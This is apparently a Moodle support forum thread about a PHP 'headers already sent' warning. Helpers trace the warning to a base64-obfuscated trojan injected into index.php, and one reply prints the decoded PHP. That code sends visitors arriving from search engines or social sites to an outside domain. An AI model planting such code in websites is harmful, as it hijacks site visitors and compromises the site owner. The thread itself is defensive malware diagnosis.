Warning error - Cannot send session cache limiter

Warning error - Cannot send session cache limiter

by Fivel Rothberg -
Number of replies: 9

Hi, 

I am using Moodle 2.2.1 and I keep seeing this error when I log in at the top of the page: 

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/fivel291/public_html/moodle/index.php:1) in /home/fivel291/public_html/moodle/lib/sessionlib.php on line 184

Also, if you happen to know how to hide errors like this one from appearing on the top of the page when students log-in I would like to know how to do that. And have not found either clear answer in the forums yet. 


Thanks very much


Average of ratings: -
In reply to Fivel Rothberg

Re: Warning error - Cannot send session cache limiter

by Sandeep Gill -
Picture of Plugin developers

Hi Fivel,

This can be due to several reasons. Can you upload your index.php here and I can have a look at it.

You can disable these messages by going to Setting > Site administration >  Development > debugging

- set 'Debug Mesaages' to 'NONE: Do not show any errors or warnings' and uncheck 'Display debug messages'

 

Hope this helps.

 

Thanks

Sandeep

Average of ratings: -
In reply to Sandeep Gill

Re: Warning error - Cannot send session cache limiter

by Fivel Rothberg -

Hi Sandeep,  Thanks for following up!! 

The index.php file should be uploaded w/ a link below. 

Cheers, 
Fivel 

Average of ratings: -
In reply to Fivel Rothberg

Re: Warning error - Cannot send session cache limiter

by Sandeep Gill -
Picture of Plugin developers

Hi Fivel,

It is the script at the top which is causing this issue. I have moved the script to the bottom of the page and the error is gone but, I'm not sure if that will hamper the functioning of the script.

 

Have a look at the attached file and let me know if that helps.

 

Thanks

Sandeep

Average of ratings: -
In reply to Sandeep Gill

Re: Warning error - Cannot send session cache limiter

by Ken Task -
Picture of Particularly helpful Moodlers

Now you've got me curious.  The code at the header of the index.php file was placed there how?  and what was it's purpose?  This a new feature in MDL 2 themes? 

I did investigate further to see if the base64 code was a remote injection of any kind and it appears it is a trojan.  Removing or moving the code to the bottom of the index.php file won't make it any safer.  Hate to say this, but might want to report this to hosting provider and ask them to do a scan of any/all php files ... not only in Moodle installation, but all PHP files of other customers if on a shared host.

'spirit of sharing', Ken

Average of ratings: -
In reply to Ken Task

Re: Warning error - Cannot send session cache limiter

by Sandeep Gill -
Picture of Plugin developers

Apologies Fivel and Ken,

Yes, Ken is right, I didn't have a look at the 'base64_decode' code and that is a trojan and it checks the referer and if it has been referred by a search engine etc. it executes the javascript.

This is what is behind base64_decode:

error_reporting(0); $qazplm=headers_sent(); if (!$qazplm){ $referer=$_SERVER['HTTP_REFERER']; $uag=$_SERVER['HTTP_USER_AGENT']; if ($uag) { if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) { if (!stristr($referer,"cache") or !stristr($referer,"inurl")){ header("Location: http namesti . bee . pl/"); exit(); } } } }

Thanks Ken.

Average of ratings: -
In reply to Sandeep Gill

Re: Warning error - Cannot send session cache limiter

by Fivel Rothberg -

Hi Ken and Sandeep, 

Thanks VERY much for for catching that! I'll get in touch w/ the host now.

Fivel 

Average of ratings: -
In reply to Fivel Rothberg

Re: Warning error - Cannot send session cache limiter

by Ken Task -
Picture of Particularly helpful Moodlers

That specific line sets up cookie parameters: path, domain, secure, httponly.  The following line checks to see if user has just logged out or their session timed out.

In Site Admin -> Server -> Session Handling the default (ie, on) is to use the database for sessions.  On a remotely hosted situation, that does cause more hits and resources on the DB.  What happens if this is turned off?  Does the error go away?
(Moodle will write to a file in the sessions directory contained in moodledata)

Also … on same form, recommend setting a cookie prefix (recommend something reflective of site: fivel291?)
Should leave the cookie path to '/' and cookie domain blank.

Re-setting above will log you out.  Just log back in again.

Do you have any re-directs for the domain (ie web site URL) under which Moodle runs?
If one removes the /moodle from the end, does the URL change?

'spirit of sharing', Ken

Average of ratings: -
In reply to Ken Task

Re: Warning error - Cannot send session cache limiter

by Fivel Rothberg -

Hi Ken, 

Thanks for your response.  I changed the Site Admin -> Server -> Session Handling > Use database for session information  to "off" but the error did not go away. 

I also added a cookie prefix fivel291. And again, the error is still present.

There IS a re-direct.  The moodle site is in the directory fivelrothberg.com/moodle.  Meanwhile, fivelrothberg.com re-directs to another site.  Could that be the problem?

Also, I uploaded the index.php file as in the above reply in case that helps.

Thanks again,

Fivel  

Average of ratings: -
In reply to Fivel Rothberg

Re: Warning error - Cannot send session cache limiter

by Ken Task -
Picture of Particularly helpful Moodlers

Not sure, but in looking at the contents of the index.php file above, it appears to have a base64_decode header.   Uhhhh, that's NOT normal.

If one opens the file in a text editor you'll see a series of lines beginning with '<script>if(window.document)try{location(12)' and then a php line with eval(base64_decode.

Download the Moodle package to a local machine and unzip.  Then compare the index.php file from that archive to that which was posted above.

'spirit of sharing', Ken

Average of ratings: -